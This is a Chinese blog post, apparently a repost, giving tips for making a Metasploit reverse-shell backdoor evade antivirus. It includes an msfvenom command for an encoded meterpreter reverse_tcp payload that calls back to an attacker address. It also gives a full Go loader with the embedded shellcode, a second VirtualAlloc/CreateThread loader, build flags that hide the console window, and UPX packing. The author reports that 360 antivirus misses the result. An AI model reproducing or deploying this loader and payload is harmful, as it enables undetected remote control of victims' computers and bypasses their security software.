2. 程式人生 > 實用技巧 >關於msf反彈後門的免殺Tips

關於msf反彈後門的免殺Tips

阿新 發佈:2020-12-02

msf是一個很強大的工具,我經常會在滲透用它來反彈shell,不過它生成的反彈後門會被不少殺軟kill,這篇文章只是講講我在msf中一個簡單的免殺小技巧

思路

我以前接觸過一款python的遠控,其實說是遠控,基本也就是nc的功能加了一個服務端的web頁面控制並加了一些其他的功能可以用來管理諸多客戶機
這款遠控我下載下來用過,並用pyinstaller打包成了exe(缺點是體積太過龐大),驚奇的是,360不殺它,然後自己想著其他語言是不是也會這樣,於是我用golang寫了一個簡易版nc反彈,編譯之後,也是不查殺的。python和golang有一個共同點,就是可以用來內聯C程式設計,所以C語言的shellcode按理說應該會達到同樣的效果

得到shellcode

msfvenom -p windows/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.1.100 -e x86/shikata_ga_nai -i 11 -f py > 1.py

建議是生成32位的,如果想生成64位也可以,-e x86/shikata_ga_nai -i 11是指用x86/shikata_ga_nai編碼迭代11次,然後生成py檔案
py檔案開啟是shellcode,我們接下來對它進行一點小改造,對於python去執行shellcode的方法,相信小夥伴都已經不陌生,在《python灰帽子》中有講解,我今天要使用的是golang,其實個人認為golang執行shellcode的程式碼是更簡潔的

Golang環境搭建

安裝Golang32位(建議32位,與前面對應,在測試過程中,如果32位shellcode配合64位golang加32位gcc,就算把golang的GOARCH改為386也依舊會失敗,建議一一對應),安裝gcc32位(可以使用TDM-GCC

程式碼編寫

package main

/*
void call(char *code) {
    int (*ret)() = (int(*)())code;
    ret();
}
*/
import "C"
import "unsafe"

func main() {
    buf := ""
    buf += "\xdd\xc6\xd9\x74\x24\xf4\x5f\x33\xc9\xb8\xb3\x5e\x2c"
    buf += "\xc9\xb1\x97\x31\x47\x1a\x03\x47\x1a\x83\xc7\x04\xe2"
    buf += "\x46\x84\xfd\x72\xee\x0e\xb5\x96\x37\x04\x6d\x63\x9f"
    buf += "\xcc\xa4\x3a\x8e\x8c\xf7\x39\x81\xca\xe4\x42\xff\xce"
    buf += "\xa3\xa2\xdb\x06\xc0\x3f\xaf\x41\x73\xba\xf7\x20\x13"
    buf += "\x98\x8c\xff\xfa\x0a\xda\x6e\xf2\x6d\xc3\x81\x07\xc0"
    buf += "\x1b\x37\xeb\xa2\xa9\x32\x71\xaf\xe9\x20\xd1\xaa\x9e"
    buf += "\xbd\x82\xf3\x81\x1f\xab\xbf\xc4\xd9\x6c\x75\x37\x3a"
    buf += "\x53\x78\x90\x79\xaf\x93\x1b\xb3\x15\x09\xe5\x45\x5c"
    buf += "\x26\x0f\x0d\x16\x52\xf1\x8a\x7e\x8b\xc4\x50\x8e\x0a"
    buf += "\x38\x2f\x2b\x40\x73\x0b\xf0\x51\x5f\xc6\xbf\x04\x47"
    buf += "\x80\x36\xe5\x88\x88\xb3\xfc\xa0\x52\xfe\x92\x81\x8d"
    buf += "\x89\xf2\x6a\xcc\x7f\x9a\xe9\x1a\x30\x73\xa3\x63\x42"
    buf += "\x10\xe9\xcf\x62\xe4\x06\x52\xe1\x8d\x88\xfe\x52\xc4"
    buf += "\xc3\xed\x7a\x0e\x66\x5f\x8c\x2c\xef\xfa\xbd\x8c\x79"
    buf += "\x6c\x01\xe3\x5c\xde\xc4\x8a\x4c\x7d\x34\x32\xb5\x23"
    buf += "\x56\x6c\x52\x3f\x15\x26\x6a\xf8\x6b\x81\x2c\x23\x8d"
    buf += "\x41\x6e\x24\x30\xc6\xcb\xba\x26\xd4\x3b\x37\xd3\xc6"
    buf += "\xa8\x5a\x16\x8f\x1e\x27\xca\xcb\xda\x7f\x74\x62\xb2"
    buf += "\x62\xa6\xb1\xfc\x64\x53\x3a\xa7\xa4\x21\x3d\x79\x08"
    buf += "\x06\x74\x2a\xa2\xe7\x0d\x68\x16\xa3\x96\xe5\xad\x32"
    buf += "\x10\xa3\x0f\x49\xc3\x69\xa7\x5b\x61\x1a\xf8\x1d\x9e"
    buf += "\x9b\x3a\x00\xfc\x18\xc3\x42\x1a\xd6\x44\x5d\xfe\xc5"
    buf += "\xb6\x68\xd2\xad\x24\xda\x74\xa7\xf3\x66\x9a\x42\x7a"
    buf += "\x50\xf0\x0b\x47\xbc\xad\x6c\x1e\xca\xbe\x90\xca\xc3"
    buf += "\x8e\x5b\xde\x66\xe2\xb3\x20\x6f\x38\x17\xc1\xac\xfb"
    buf += "\xd3\x2f\x91\xa7\xff\x65\xd7\xd0\x25\x4c\xd4\xb3\x35"
    buf += "\x38\xa1\x82\xb8\x23\x42\xe9\xa5\x95\x8e\xc4\x35\xca"
    buf += "\x92\xfe\xde\x62\x70\xd6\x7a\x7f\xfd\xfb\xf0\x24\xbd"
    buf += "\x5d\x6d\x3d\x13\xbc\x1d\x25\x54\x9d\x0e\x68\xc8\x9a"
    buf += "\x10\x87\xf0\xc9\xac\x37\x57\x84\x23\x5f\x8a\xc0\xab"
    buf += "\x52\x6e\xae\x79\xa2\xdb\xff\xd8\x41\x28\x8b\xd3\x9d"
    buf += "\x68\x3c\x55\xf2\xfe\x0c\x8a\x38\xdf\xb3\x80\x9b\x70"
    buf += "\x2b\x4e\xe1\xfa\x0b\xfe\xf5\xc3\x1a\x0d\x83\xb0\x69"
    buf += "\xd0\x68\xfb\xe0\xae\xbd\x56\x52\x17\x9a\xf8\x8f\xc0"
    buf += "\x14\x8c\xb0\xf7\x0e\x87\xfa\x54\xf4\x04\x4a\x5a\xc8"
    buf += "\x89\x57\x0e\xbf\x7a\x76\x9b\xfe\xb8\x5f\x31\x42\xec"
    buf += "\xaf\x18\x9e\x3f\xf0\x09\x79\x86\xb3\x08\x29\x50\xfd"
    buf += "\xc3\x46\x7d\x24\x51\x5b\xd0\x81\x19\x6f\xc2\x2c\x17"
    buf += "\xab\xa3\xb7\xd9\x6f\x82\xd9\x37\x5f\x38\x01\xd8\xfd"
    buf += "\xfd\x11\x22\x61\xd0\x92\x45\x37\x4f\x6c\x4e\x91\x3b"
    buf += "\x42\x07\xc5\x77\xdc\x52\xd6\xc7\x9d\x7b\x62\xba\x1c"
    buf += "\x62\x3c\xde\xad\x96\x03\x55\xde\x9d\x52\x5c\x5d\x0c"
    buf += "\x73\x0e\xc3\x4c\xae\x7d\x1c\x7c\x64\xaf\xbb\xce\xa6"
    buf += "\x02\x0e\xb1\x51\xc4\x2d\x1b\x6b\xb7\x7c\xd9\x4b\xc3"
    buf += "\x8c\x43\xd6\x1b\x2a\x4f\x5e\x0a\x9a\xd5\x4d\x45\x64"
    buf += "\x6c\x0c\xc8\xf5\x59\xd7\x45\x36\x85\x99\x8d\x34\x65"
    buf += "\x21\xd3\x3b\x35\xce\x22\x29\x0c\x4e\xca\x48\x3f\x55"
    buf += "\x5d\x1b\xda\x35\xc1\x2d"
    // at your call site, you can send the shellcode directly to the C
    // function by converting it to a pointer of the correct type.
    shellcode := []byte(buf)
    C.call((*C.char)(unsafe.Pointer(&shellcode[0])))
}

以上就是全部程式碼
其實Golang還有個執行shellcode的方法是不用內聯C語言的,但是我這邊測試能接到反彈shell,但是執行命令會直接斷開,程式碼我也貼出來

package main

import (
    "syscall"
    "unsafe"
)

func ThreadExecute(Shellcode []byte) {
    var K32 = syscall.MustLoadDLL("kernel32.dll")
    var CreateThread = K32.MustFindProc("CreateThread")
    var VirtualAlloc = K32.MustFindProc("VirtualAlloc")
    var WaitForSingleObject = K32.MustFindProc("WaitForSingleObject")

    Addr, _, _ := VirtualAlloc.Call(0, uintptr(len(Shellcode)), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE)
    AddrPtr := (*[990000]byte)(unsafe.Pointer(Addr))

    for i := 0; i < len(Shellcode); i++ {
        AddrPtr[i] = Shellcode[i]
    }

    ThreadAddr, _, _ := CreateThread.Call(0, 0, Addr, 0, 0, 0)
    WaitForSingleObject.Call(ThreadAddr, 0xFFFFFFFF)
}

關於斷開的原因,希望找出原因的能告知我一下,其實我們會發現,內聯C是比較簡單的

防毒測試

在程式碼所在目錄cmd執行go build得到二進位制檔案(或者可以用go build -ldflags="-s -w"減小體積,go build -ldflags="-H windowsgui -s -w"去掉命令視窗)

可以看到360的靜態查殺和動態查殺都沒有發現
那麼是否正常工作呢

可以看到完全是沒問題的,體積比python編譯出來的小的多,編譯出來是500多kb,然後經過upx壓縮了一下(測試upx壓縮後功能依舊正常),降低到了200多kb

視訊

{% bilibili "aid:9975200" "quality:high" "danmaku" "allowfullscreen" %}

相關推薦

關於msf反彈後門Tips

msf是一個很強大的工具,我經常會在滲透用它來反彈shell,不過它生成的反彈後門會被不少軟kill,這篇文章只是講講我在msf中一個簡單的小技巧

使用Python進行防病毒解析

很多滲透工具都提供了許可權維持的能力,如Metasploit、Empire和Cobalt Strike,但是都會被防病毒軟體檢測到這種惡意行為。在探討一個許可權維持技巧的時候,似乎越來越多的人關注的是,這個方式會不會被被軟殺掉?

E語言之易語言程式永久去除_EL_HideOwner

大家可以用PCHunter檢視下,任何程式,包括無視窗的程式,易語言都會建立個隱藏的視窗,類名為_EL_HideOwner

通過Python實現Payload分離過程詳解

缺點: 編譯成exe以後體積過大 實現: msf生成shellcode程式碼: 將payload給copy下來,去除引號。

PHP木馬的一些總結

前言 這篇文章寫一些php木馬的一些技巧,希望對大家有點幫助。這裡解釋一下什麼是php木馬,這裡大體分為三種:

一句話木馬,人才太多了

題記 天下古今之庸人,皆以一惰字致敗;天下古今之才人,皆以一傲字致敗。------曾國藩

小總結

前言 本文主要介紹shellcode免殺技術,通過網上相關文章的參考和自己的一點理解,現將免殺測試效果最好的方案分享給大家,供大家學習參考。(本文僅供參考學習,嚴禁用於其他用途,若造成不良影響的,由使用者本人承擔

python實現的分離(包含pyinstaller的安裝與使用)

題記 今天本來打算學python的,突然看到萌萌噠的小玉玉發了個免殺的工具,迫不及待的來試試了。此貼記錄我實際操作的整個過程,在此膜拜大神,大神上次還分享了個0day(雖然爛大街了),但是對於我這個菜鳥來說,還是

程序注入學習

程序注入學習 下面是自寫的程序注入程式碼,已經對主要程式碼進行註釋,相關函式如有不懂請檢視官方文件,windows defend ,360全程

python開發(3)-PHP異或

關於eval函式在php給出的官方說明是 eval 是一個語言構造器而不是一個函式,不能被 可變函式 呼叫可變函式:通過一個變數,獲取其對應的變數值,然後通過給該值增加一個括號(),讓系統認為該值是一個函式,從而當做

利用註釋及自定義加密Webshell

- 0x00:簡介- 此篇只討論php,其實原理是相同的,本文的思路依然適用於其他語言由於php7.1以後assert不能拆分了,所以此篇不使用assert函式作為核心,使用適用性更廣的eval。

cs-使用python進行

技術標籤:滲透測試 環境 使用python版本為python3.6 32位版本,64位版本測試會報錯。 安裝pyinstaller,pywin32

學習——C++(一)

一、基本函式學習 1、VirtualAlloc函式 用來動態申請記憶體,通常用來分配大塊的記憶體

php異或

import requests,base64,time,sys,threading,queue #異或 #<?php $a=(\"!\"^\"@\").\'ssert\';$a($_POST[\'hacker\']);?>

78:Python開發-多執行緒Fuzz&Waf異或&爆破

本課知識點: 協議模組使用,Request爬蟲技術,簡易多執行緒技術,編碼技術,Bypass後門技術

記一次payload繞過電腦管家

一、msf命令提示符下generate命令生成1、首先可以使用show payloads命令檢視所有的payload,然後使用use命令選中其中一個。msf5 > show payloadsPayloads======== # Name Disclosure Date Rank Check Descriptio

生成器之Charlotte解析

一、工具介紹 charlotte是一款Python編寫的自動化工具,用來生成的dll檔案,線上查是1/26報毒,總的來說效果還可以

11.軟對抗:veil-Evasion套件 + Metasploit自定義payload

注意:所有測試都需要使用本地Teamserver,都需要在斷網環境下測試! 一、veil-Evasion的安裝:

Metasploit 實現木馬生成、捆綁及

​簡介:在滲透測試的過程中,避免不了使用到社會工程學的方式來誘騙對方執行我們的木馬或者點選我們準備好的惡意連結。木馬的捆綁在社會工程學中是我們經常使用的手段,而為了躲避防毒軟體的查,我們又不得不對木

msf生成後門實戰漫遊內網

前言:當我們在滲透當中首先拿到webshell許可權,進一步提權滲透,獲得內網的主機,假設在這裡我們獲取了具有雙網絡卡的web伺服器,我們的目的是通過這臺web伺服器,進行內網漫遊,獲取內網中其他主機的系統shell,